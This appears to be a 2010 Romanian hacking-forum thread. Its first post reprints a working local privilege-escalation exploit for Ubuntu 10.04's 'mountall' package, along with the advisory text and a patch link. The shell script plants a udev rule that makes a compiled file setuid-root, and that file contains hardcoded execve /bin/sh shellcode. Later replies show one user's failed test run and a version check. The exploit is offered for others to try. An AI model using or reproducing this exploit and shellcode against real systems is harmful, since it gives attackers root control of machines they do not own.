Nytro Posted September 22, 2010 Report Posted September 22, 2010 (edited) Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability#!/bin/sh# by fuzz. For Anux inc. ## ubuntu 10.04 , 10.10if [ -z "$1" ]then echo "usage: $0 <UDEV KERNEL EVENT>" echo "see here http://www.reactivated.net/writing_udev_rules.html" exitficat > usn985-exploit.sh << EOF#!/bin/shchown root:root $PWD/usn985-scchmod +s $PWD/usn985-scEOFcat > usn985-sc.c << EOFchar *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68""\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";main(){int *r;*((int *)&r+2)=(int)s;}EOFgcc usn985-sc.c -o usn985-scecho "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.ruleschmod +x usn985-exploit.shecho "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"Vulnerable: Ubuntu Ubuntu Linux 10.04 LTSNot Vulnerable: Ubuntu mountall 2.15.2Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability[I]Ubuntu Linux is prone to a local privilege-escalation vulnerability that affects the 'mountall' package.Local attackers can exploit this issue to execute arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer.Ubuntu 10.04 LTS is vulnerable; other versions may also be affected. [/I]Update: http://security.ubuntu.com/ubuntu/pool/main/m/mountall/mountall_2.15.2_i386.debIncercati si voi, cei cu Ubuntu. Edited September 22, 2010 by Nytro Quote
Zatarra Posted September 22, 2010 Report Posted September 22, 2010 Eram sigur ca iese saptamanile astea pentru 10.10 Cu toate ca sunt la McDonald fac proba repede pe un 10.04 si revin cu edit Edit:./a.sh: 21: cannot create /dev/.udev/rules.d/root.rules: Permission deniedAll set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-rootproba@nasa.gov ~ $ mountallCommand 'mountall' is available in '/sbin/mountall'The command could not be located because '/sbin' is not included in the PATH environment variable.This is most likely caused by the lack of administrative priviledges associated with your user account.mountall: command not foundproba@nasa.gov ~ $ /sbin/mountallmountall: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.mountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: Connection is closedmountall: swapon /dev/disk/by-uuid/1b414176-f0db-4028-be34-2829dab20f02 [1919]: No such file or directoryKernel version : 2.6.32-24-genericDeocamdata atat.. voi reveni cu reedit mai pe seara sau cel tarziu maine Quote
Zatarra Posted February 8, 2011 Report Posted February 8, 2011 Ca sa nu va mai chinuiti sa stiti daca functioneaza sau nu dati asa:mountall --versionNot Vulnerable: Ubuntu mountall 2.15.2Tineti minte, functioneaza doar pe Ubuntu 10.04 Quote
